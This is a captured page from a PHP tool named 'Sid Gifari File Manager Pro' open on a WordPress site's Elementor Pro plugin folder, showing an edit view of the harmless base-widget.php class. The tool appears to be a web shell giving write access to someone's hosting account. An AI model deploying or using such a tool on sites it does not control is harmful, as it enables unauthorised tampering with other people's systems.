🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-14 10:29:00 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
janapremi.anantaacharya.com.np
/
wp-content
/
plugins
/
elementor-pro
/
base
📍 /home/therahul/janapremi.anantaacharya.com.np/wp-content/plugins/elementor-pro/base
🔄 Refresh
✏️
Editing: base-widget.php
Writable
<?php namespace ElementorPro\Base; use Elementor\Widget_Base; use ElementorPro\Plugin; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly } abstract class Base_Widget extends Widget_Base { use Base_Widget_Trait; use On_Import_Trait; }
💾 Save Changes
❌ Cancel